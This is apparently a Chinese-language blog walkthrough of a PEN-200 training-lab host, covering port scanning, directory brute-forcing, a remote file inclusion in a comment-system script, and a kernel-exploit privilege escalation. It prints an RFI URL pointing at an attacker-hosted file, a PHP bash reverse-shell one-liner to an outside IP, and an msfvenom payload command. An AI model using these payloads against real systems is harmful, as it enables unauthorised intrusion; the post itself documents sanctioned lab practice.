当前位置: 首页 > news >正文

【pen200-lab】10.11.1.8

pen200-lab 学习笔记

【pen200-lab】10.11.1.5


🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年12月4日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • 21
    • 139
    • 3306
    • 80
    • 443
    • 631
    • 80
    • rfi
    • 建立一个稳定shell
    • 总结

信息收集

nmap -p- --min-rate 10000 -A  10.11.1.8
21/tcp   open   ftp         vsftpd 2.0.1
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open   ssh         OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open   http        Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
| http-robots.txt: 2 disallowed entries 
|_/internal/  /tmp/ 
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open   rpcbind     2 (RPC #100000)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: MYGROUP)
443/tcp  open   ssl/https   Apache/2.0.52 (CentOS)
commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
445/tcp  open   netbios-ssn Samba smbd 3.0.33-0.17.el4 (workgroup: MYGROUP)
631/tcp  open   ipp         CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
868/tcp  closed unknown
3306/tcp open   mysql?

有用的信息筛选如上

21

登陆不上
咋样都不行
在这里插入图片描述

139

smbmap -H 10.11.1.5   

没有任何开放
在这里插入图片描述对445端口进行扫描依旧没有什么信息
在这里插入图片描述

3306

mysql -h 10.11.1.8 

测试一下登陆也是登陆不上的
在这里插入图片描述

80

gobuster dir -u http://10.11.1.8/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -t 100

首先爆破页面
得到了robots.txt
啥也没有

在这里插入图片描述还有一个评论页面

在这里插入图片描述在这里插入图片描述试了几个xss都不行

443

对https网站进行访问,发现是80页面的同站

在这里插入图片描述

631

对631cups1.1进行测试
谷歌上说他可能存在恶意的.so文件调用从而造成远程rce
我这样生成
可是不行

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf-so > shell.so 

失败了,具体方法就不说了
只是分享我的思路

80

我思考了五分钟,我认为脆弱点应该还是在80页面上
我在源代码中发现了

var MooTools={version:"1.2.0",build:""}

但是谷歌上面几乎没有他的利用方法
紧接着我看到了他
我很好奇,这么多acs是啥

于是我连着搜索了一下
在这里插入图片描述这不就是那个论坛的标题么,我人傻了
我上一次离开那个论坛到现在花了三个小时

在这里插入图片描述其中基本上都是rce,lfi,rfi
其中rce以及lfi都不起作用

直到我开始尝试

rfi

在这里插入图片描述

http://10.11.1.8/internal/advanced_comment_system/index.php?ACS_path=http://10.11.0.222/evil.txt?

我可以包含远程的一个文本,从而执行其中的代码,而我决定将php代码放入其中
我首先需要在本地开启一个服务器
我想他最好是下面这样

<?php echo shell_exec("bash -i >& /dev/tcp/192.168.119.175/443 0>&1;");?>

在这里插入图片描述

建立一个稳定shell

python -c 'import pty; pty.spawn("/bin/sh")'

而后我会上传linpeas.sh
这就不说了,linux比windows好操作多了
在这里插入图片描述
漏洞建议这一块有问题,少命令

谷歌搜一下就能搜出来

Linux version 2.6.9-89.EL

https://www.exploit-db.com/exploits/1397

用这个就行,直接给出了编译好的exp
上传赋权利用

在这里插入图片描述
剩下的就不说了

总结

很简单,但是我在一个智障点卡了三个小时
我服了

相关文章:

  • Spring Boot 统一数据返回格式 分析 和 处理
  • upload-labs-master靶场训练笔记
  • 快速上手Spring Cloud 六:容器化与微服务化
  • Spring Transaction 指定事务管理器问题
  • Spring 的 Ioc配置
  • JSP技术及其应用
  • npm install报错,常见的解决方案
  • 【从零开始学习重要知识点 | 第一篇】快速了解什么是幂等性以及常见解决方案
  • Spring Boot到底是如何进行自动配置的?
  • Rocky Linux 运维工具yum
  • java线程池原理源码解析,程序员如何技术划水
  • Python 实现Excel自动化办公(下)
  • 文件操作及IO
  • 精品基于Javaweb的酒店民宿管理推荐平台SSM
  • [附源码]计算机毕业设计二次元信息分享平台的设计及实现
  • [附源码]Python计算机毕业设计Django勤工助学管理系统
  • Request和Response基础知识入门
  • Lottie 动画导出为 GIF/MP4 以及与 QML 集成演示
  • 前端问题解决方法
  • 每日挠头算法题(十五)螺旋矩阵II
  • 度量方法总结
  • 基于正则化Regularized Interpolation插值算法的图像超分辨重构研究-附Matlab代码
  • Java 反射机制
  • 【CMU15-445 Part-8】Tree Indexes ii
  • JSON相关
  • Hygieia (Devops)开源-搭建步骤(一)
  • 桥接设计模式
  • [附源码]计算机毕业设计物品捎带系统Springboot程序
  • 100天精通Python(数据分析篇)——第67天:Pandas数据连接、合并、重构(pd.merge、pd.concat、stack、unstack)
  • 使用uni-app创建扫码连接wifi小程序
  • 【单片机基础】ADC0832详解
  • [附源码]计算机毕业设计基于springboot的文成考研培训管理系统